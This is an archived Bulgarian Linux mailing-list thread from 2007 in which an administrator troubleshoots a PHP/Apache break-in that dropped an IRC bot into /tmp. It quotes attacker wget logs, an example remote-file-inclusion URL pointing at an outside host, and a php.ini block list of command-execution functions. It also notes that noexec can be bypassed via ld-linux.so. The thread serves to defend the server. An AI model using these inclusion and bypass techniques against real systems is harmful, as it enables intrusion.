Linux-Bulgaria.ORG
навигация

 

начало

пощенски списък

архив на групата

семинари ...

документи

как да ...

 

 

Предишно писмо Следващо писмо Предишно по тема Следващо по тема По Дата По тема (thread)

Re: [Lug-bg] пробив през апаче и пхп :(


  • Subject: Re: [Lug-bg] пробив през апаче и пхп :(
  • From: Marian Marinov <mm@xxxxxxxx>
  • Date: Thu, 12 Jul 2007 15:29:15 +0300

Има доста информация в интернет как можеш да стартираш бинарен файл върху дял 
който е монтиран noexec. Основната идея е да се 
използва /lib/ld-linux.so.2 /path/to/binary/file
Е, за да работи това ти трябва специално преправен файл.... но като цяло няма 
такова нещо като немогат да се стартират програми от този дял(освен ако не си 
с RSBAC, RBAC, NSA SElinux или друг подобен security patch).

Поздрави
  Мариян

On Thursday 12 July 2007 13:53:53 deb4o wrote:
> safe_mode не е добър вариант за решение, имам доста виртуални хостове на
> сайтове, никой от тях не използва perl/cgi а само пхп за всеки сайта съм
> сетнал open_base dir и не могат да отварят нищо освен собсвената си
> директория. единственно session_path не съм сетвал допълнително и е по
> подразбиране в /tmp
>
> /var/tmp съм я направил като symbolic link към дяла /tmp и там не могат да
> се стартират бинарни файлове.
>
>
>
>
>   ----- Original Message -----
>   From: Valery Dachev
>   To: Linux Users Group - Bulgaria
>   Sent: Thursday, July 12, 2007 11:08 AM
>   Subject: Re: [Lug-bg] пробив през апаче и пхп :(
>
>
>   Имах подобен проблем с един от сайтовете при мен. Можеш в php.ini да
> добавиш примерно:
>
>     disable_functions = exec,passthru,system,proc_open,shell_exec
>
>   С това ще забраниш изпълнението по-често използваните функции за
> изпълнение на команди.
>
>   Преди това обаче е добре да разбереш как успяват да накарат PHPто да
> изпълнява въпросните функции. В моя случай в бъгавият сайт имаше глупост от
> типа на:
>
>     include( $path . "/neshtosi.php" );
>
>   Променливата $path не винаги се установяваше и хахорите извикваха адрес
> от типа на:
>
>    
> http://my.site.com/shitty-script.php?path=http://their.site.com/their-scrip
>t.txt&
>
>   Ако имаш много сайтове и не можеш да разбереш през кой от тях ти правят
> мизерията, погледни кой е потребителят-собственик на изтеглените файлове.
> Това би свършило работа, ако PHP работи като CGI и използваш SUExec. Ако е
> като модул и имаш късмета да си с Apache 2, пробвай да инсталираш MPM ITK
> (в Debian и Ubuntu пакетът е apache2-mpm-itk). Разбереш ли кой е
> потребителят, ще трябва да претърсиш файловете им за include, include_once,
> require и require_once, за да видиш кои от тях използват динамични
> несигурни пътища. Нищо чудно това да е стара версия на софтуер с известни
> проблеми.
>
>   Поздрави,
>   Валери.
>
>   deb4o wrote:
> няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на
> irc bot
> все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги
> страртират.
> но искам да разбера къде е дупката в апачето.
> Apache 2.0.53 и php 4.3.9
>
> Така и не мога да разбера от къде влизат. търсих по логовете но само
> единственно в error log-a на апачето намирам подобни на тези неща:
>
> --00:43:08--  http://private.whitehat.ro/flood
>            => `flood'
> Resolving private.whitehat.ro... 72.22.77.22
> Connecting to private.whitehat.ro[72.22.77.22]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 208,412 [text/plain]
>
>     0K .......... .......... .......... .......... .......... 24%   60.12
> KB/s
>    50K .......... .......... .......... .......... .......... 49%  237.64
> KB/s
>   100K .......... .......... .......... .......... .......... 73%   16.05
> KB/s
>   150K .......... .......... .......... .......... .......... 98%   60.06
> KB/s
>   200K ...                                                   100%   10.13
> MB/s
>
> 00:43:13 (40.79 KB/s) - `flood' saved [208412/208412]
>
> -------------------
> --11:39:45--  http://private.whitehat.ro/n.jpg
>            => `n.jpg'
> Resolving private.whitehat.ro... 72.22.77.22
> Connecting to private.whitehat.ro[72.22.77.22]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 261,375 [image/jpeg]
>
>     0K .......... .......... .......... .......... .......... 19%   60.85
> KB/s
>    50K .......... .......... .......... .......... .......... 39%  122.81
> KB/s
>   100K .......... .......... .......... .......... .......... 58%   16.38
> KB/s
>   150K .......... .......... .......... .......... .......... 78%   61.60
> KB/s
>   200K .......... .......... .......... .......... .......... 97%   81.52
> KB/s
>   250K .....                                                 100%    1.02
> MB/s
>
> 11:39:52 (44.69 KB/s) - `n.jpg' saved [261375/261375]
>
> _______________________________________________
> Lug-bg mailing list
> Lug-bg@xxxxxxxxxxxxxxxxxx
> http://linux-bulgaria.org/mailman/listinfo/lug-bg
>
>
>
>
> ---------------------------------------------------------------------------
>---
>
>
>   _______________________________________________
>   Lug-bg mailing list
>   Lug-bg@xxxxxxxxxxxxxxxxxx
>   http://linux-bulgaria.org/mailman/listinfo/lug-bg



_______________________________________________
Lug-bg mailing list
Lug-bg@xxxxxxxxxxxxxxxxxx
http://linux-bulgaria.org/mailman/listinfo/lug-bg



 

наши приятели

 

линукс за българи
http://linux-bg.org

FSA-BG
http://fsa-bg.org

OpenFest
http://openfest.org

FreeBSD BG
http://bg-freebsd.org

KDE-BG
http://kde.fsa-bg.org/

Gnome-BG
http://gnome.cult.bg/

проект OpenFMI
http://openfmi.net

NetField Forum
http://netField.ludost.net/forum/

 

 

Linux-Bulgaria.ORG

Mailing list messages are © Copyright their authors.